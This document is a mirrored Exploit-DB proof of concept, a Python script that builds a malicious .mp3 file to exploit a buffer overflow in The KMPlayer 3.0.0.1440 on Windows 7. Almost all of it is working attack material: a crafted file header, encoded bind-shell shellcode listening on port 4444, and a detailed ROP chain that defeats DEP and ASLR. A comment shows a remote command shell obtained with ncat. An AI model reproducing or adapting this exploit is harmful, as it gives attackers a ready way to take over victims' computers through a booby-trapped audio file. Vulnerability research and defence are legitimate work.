The KMPlayer 3.0.0.1440 (Windows 7) – ‘.mp3’ Local Buffer Overflow (ASLR Bypass)

  • 作者: xsploitedsec
    日期: 2011-06-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17383/
  • #!/usr/bin/python
    # Exploit Title: The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass)
    # Date: Jun 10th, 2011
    # Author(s): 
    # 	dookie and ronin (initial XPSP3 DEP bypass PoC)
    # 	xsploitedsec <xsploitedsecurity[at]gmail[dot]com> (Win7 + ASLR mod)
    # Software Link: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
    # Tested On: Windows7 x64 Ultimate SP1 Eng
    #
    # References:
    # http://www.exploit-db.com/exploits/17364/
    # https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
    # Video of this PoC in action: http://www.youtube.com/watch?v=jAHJveGiCfI
    #
    # Shouts/Thanks: edb-team, corelanc0d3r/corelan team, dookie2000ca, kAoTiX, deca, MaX
    # "When the going gets tough, the tough get going."
    # Have fun!
    
    import os
    
    evilfile = "km_pwn_aslr.mp3"
    
    head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13"
    "\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70"
    "\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65"
    "\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3"
    "\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34"
    "\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E"
    "\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65"
    "\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45"
    "\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54"
    "\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C"
    "\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61"
    "\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27"
    "\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0"
    "\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0"
    "\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F"
    "\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00"
    "\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44"
    "\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52"
    "\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C"
    "\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D"
    "\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D"
    "\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC"
    "\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42"
    "\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00"
    "\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49"
    "\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B"
    "\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00"
    "\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F"
    "\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C"
    "\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F"
    "\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00"
    "\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00"
    "\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D"
    "\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75"
    "\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC"
    "\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49"
    "\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20"
    "\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00"
    "\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93"
    "\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00"
    "\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00"
    "\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00"
    "\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00"
    "\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00"
    "\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00"
    "\x00\x00"
    
    #xs@ArchBook ~ $ msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -b '\x00\x0a\x0d' -t c
    #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
    #
    #xs@ArchBook ~ $ ncat 10.0.1.7 4444
    #Microsoft Windows [Version 6.1.7601]
    #Copyright (c) 2009 Microsoft Corporation.All rights reserved.
    #
    #C:\Program Files (x86)\The KMPlayer>
    
    shellcode = (
    "\xb8\x72\x95\x89\x50\xdd\xc1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
    "\x56\x31\x43\x13\x83\xc3\x04\x03\x43\x7d\x77\x7c\xac\x69\xfe"
    "\x7f\x4d\x69\x61\x09\xa8\x58\xb3\x6d\xb8\xc8\x03\xe5\xec\xe0"
    "\xe8\xab\x04\x73\x9c\x63\x2a\x34\x2b\x52\x05\xc5\x9d\x5a\xc9"
    "\x05\xbf\x26\x10\x59\x1f\x16\xdb\xac\x5e\x5f\x06\x5e\x32\x08"
    "\x4c\xcc\xa3\x3d\x10\xcc\xc2\x91\x1e\x6c\xbd\x94\xe1\x18\x77"
    "\x96\x31\xb0\x0c\xd0\xa9\xbb\x4b\xc1\xc8\x68\x88\x3d\x82\x05"
    "\x7b\xb5\x15\xcf\xb5\x36\x24\x2f\x19\x09\x88\xa2\x63\x4d\x2f"
    "\x5c\x16\xa5\x53\xe1\x21\x7e\x29\x3d\xa7\x63\x89\xb6\x1f\x40"
    "\x2b\x1b\xf9\x03\x27\xd0\x8d\x4c\x24\xe7\x42\xe7\x50\x6c\x65"
    "\x28\xd1\x36\x42\xec\xb9\xed\xeb\xb5\x67\x40\x13\xa5\xc0\x3d"
    "\xb1\xad\xe3\x2a\xc3\xef\x6b\x9f\xfe\x0f\x6c\xb7\x89\x7c\x5e"
    "\x18\x22\xeb\xd2\xd1\xec\xec\x15\xc8\x49\x62\xe8\xf2\xa9\xaa"
    "\x2f\xa6\xf9\xc4\x86\xc6\x91\x14\x26\x13\x35\x45\x88\xcb\xf6"
    "\x35\x68\xbb\x9e\x5f\x67\xe4\xbf\x5f\xad\x93\x87\x91\x95\xf0"
    "\x6f\xd0\x29\xe7\x33\x5d\xcf\x6d\xdc\x0b\x47\x19\x1e\x68\x50"
    "\xbe\x61\x5a\xcc\x17\xf6\xd2\x1a\xaf\xf9\xe2\x08\x9c\x56\x4a"
    "\xdb\x56\xb5\x4f\xfa\x69\x90\xe7\x75\x52\x73\x7d\xe8\x11\xe5"
    "\x82\x21\xc1\x86\x11\xae\x11\xc0\x09\x79\x46\x85\xfc\x70\x02"
    "\x3b\xa6\x2a\x30\xc6\x3e\x14\xf0\x1d\x83\x9b\xf9\xd0\xbf\xbf"
    "\xe9\x2c\x3f\x84\x5d\xe1\x16\x52\x0b\x47\xc1\x14\xe5\x11\xbe"
    "\xfe\x61\xe7\x8c\xc0\xf7\xe8\xd8\xb6\x17\x58\xb5\x8e\x28\x55"
    "\x51\x07\x51\x8b\xc1\xe8\x88\x0f\xf1\xa2\x90\x26\x9a\x6a\x41"
    "\x7b\xc7\x8c\xbc\xb8\xfe\x0e\x34\x41\x05\x0e\x3d\x44\x41\x88"
    "\xae\x34\xda\x7d\xd0\xeb\xdb\x57"
    )
    
    # A few notes:
    # All DEP/ASLR bypass ROP code is from PProcDLL.dll (and assumes no ASLR on this module).
    # 1.
    # 	Calls to VirtualProtect (from pprocdll.dll) are found at:
    # 	0x1014717B : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
    # 	0x101471F4 : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
    # 2.
    #	A kernel32 pointer is already sitting in ECX after the crash (on my test PC).
    #
    #	For the sake of challenge and learning. I use ROP/static offsets to dynamically retrieve a kernel32 pointer
    #	from the stack/get it into a register. I then increase this value until it points at &Kernel32.VirtualProtect().
    #	The rest is just basic ROP/DEP (using the VirtualProtect() method).
    
    eip_offset = 4095
    #kernel32 ptr offset = initial ESP-288
    #virtualprotect ptr offset = kernel32 ptr + 1075
    
    junk = "\x41" * eip_offset
    
    rop_align = "\x41\x41\x41\x41"
    
    ################################# Begin ROP chain #################################
    
    ########## Redirect execution back to stack ##########
    rop = "\x17\xBF\x0E\x10"						#0x100EBF17 :# ADD ESP,20 # RETN 4
    rop += rop_align * 9
    ########## Place stack pointer in EAX ##########
    rop += "\x7F\xCB\x0F\x10"						#0x100FCB7F :# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
    rop += rop_align	* 15
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    ########## Jump over VirtualProtect() params ##########
    rop += "\x56\x75\x13\x10"						#0x10137556 :# ADD ESP,20 # RETN
    ########## VirtualProtect call placeholder ##########
    rop += "\x42\x45\x45\x46"						#&Kernel32.VirtualProtect() placeholder - "BEEF"
    rop += "WWWW" 								#Return address param placeholder
    rop += "XXXX"							#lpAddress param placeholder
    rop += "YYYY"							#Size param placeholder
    rop += "ZZZZ"							#flNewProtect param placeholder
    rop += "\x60\xFC\x18\x10" 						#lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
    rop += rop_align	* 2
    ########## Grab kernel32 pointer from the stack, place it in EAX ##########
    rop += "\x5D\x1C\x12\x10" * 6 					#0x10121C5D :# SUB EAX,30 # RETN
    rop += "\xF6\xBC\x11\x10" 						#0x1011BCF6 :# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN 
    rop += rop_align
    ########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
    rop += ("\x76\xE5\x12\x10" + rop_align) * 4		#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    rop += "\x40\xD6\x12\x10"						#0x1012D640 :# ADD EAX,20 # RETN
    rop += "\xB1\xB6\x11\x10"						#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\x33\x29\x0E\x10"						#0x100E2933 :# DEC EAX # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    ########## At this point, ECX = &kernel32.VirtualProtect, EDI/EAX = initial stack pointer ########## 
    
    ########## Make EAX point to address of VirtualProtect() placeholder ##########
    rop += "\xB1\xB6\x11\x10" * 5					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10" * 2					#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\xD5\xCE\x11\x10" * 4					#0x1011CED5 :# INC EAX # RETN
    ########## Write VirtualProtect pointer to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Make ECX point to address of nops / shellcode ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align * 2
    rop += ("\x76\xE5\x12\x10" + rop_align) * 3		#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    ########## Make EAX point to return address placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 6					#0x1011B6B1 :# ADD EAX,0C # RETN
    ########## Write return address to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Make EAX point to lpAddress placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 7					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD5\xCE\x11\x10" * 4					#0x1011CED5 :# INC EAX # RETN
    ########## Write lpAddress to stack ##########
    rop += "\x41\x2F\x11\x10"						#0x10112F41 :# MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
    rop += rop_align
    ########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
    rop += "\x77\x78\x12\x10"						#0x10127877 :# SUB EAX,7 # POP ESI # RETN
    rop += rop_align * 2
    rop += "\x33\x29\x0E\x10"						#0x100E2933 :# DEC EAX # RETN
    rop += "\x81\x96\x03\x10"						#0x10039681 :# XCHG EAX,EBX # ADD AL,10 # RETN 	[Module : PProcDLL.dll]** 
    ########## Make EAX point to Size param placeholder ##########
    rop += "\xC8\x1B\x12\x10"						#0x10121BC8 :# MOV EAX,EDI # POP ESI # RETN
    rop += rop_align
    rop += "\xB1\xB6\x11\x10" * 6					#0x1011B6B1 :# ADD EAX,0C # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    ########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    rop += "\x2C\x2A\x0D\x10"						#0x100D2A2C :# XOR EAX,EAX # RETN
    rop += ("\x76\xE5\x12\x10" + rop_align) * 10	#0x1012E576 :# ADD EAX,100 # POP EBP # RETN
    ########## Write Size param to stack ##########
    rop += "\x60\x83\x02\x10"						#0x10028360 :# MOV DWORD PTR DS:[ECX],EAX # RETN
    ########## Make EAX point to address of flNewProtect placeholder ##########
    rop += "\xD2\x9F\x10\x10"						#0x10109FD2 :# MOV EAX,ECX # RETN
    rop += "\xD0\x64\x03\x10"						#0x100364D0 :# ADD EAX,8 # RETN
    rop += "\x33\x29\x0E\x10" * 4					#0x100E2933 :# DEC EAX # RETN
    rop += "\x01\x2B\x0D\x10"						#0x100D2B01 :# MOV ECX,EAX # RETN
    ########## Put flNewProtect param (0x00000040) in EAX ##########
    rop += "\x2C\x2A\x0D\x10"						#0x100D2A2C :# XOR EAX,EAX # RETN
    rop += "\x68\xE5\x12\x10"						#0x1012E568 :# ADD EAX,40 # POP EBP # RETN
    rop += rop_align
    ########## Write flNewProtect param to stack ##########
    rop += "\x60\x83\x02\x10"						#0x10028360 :# MOV DWORD PTR DS:[ECX],EAX # RETN
    
    ########## Everything is ready to go, Get EBX back into ESP and RETN ##########
    rop += "\xD8\xA3\x10\x10"						#0x10039681 :# XCHG EAX,EBX # ADD AL,10 # RETN
    rop += rop_align
    rop += "\x99\x09\x11\x10"						#0x10110999 :# XCHG EAX,ESP # RETN
    ################################# End ROP chain #################################
    
    nops = "\x90" * 300
    padding = "D" * (7000 - len(head + junk + rop + nops + shellcode))
    
    sploit = (head + junk + rop + nops + shellcode + padding)
    
    crashy = open(evilfile,"w")
    crashy.write(sploit)
    crashy.close()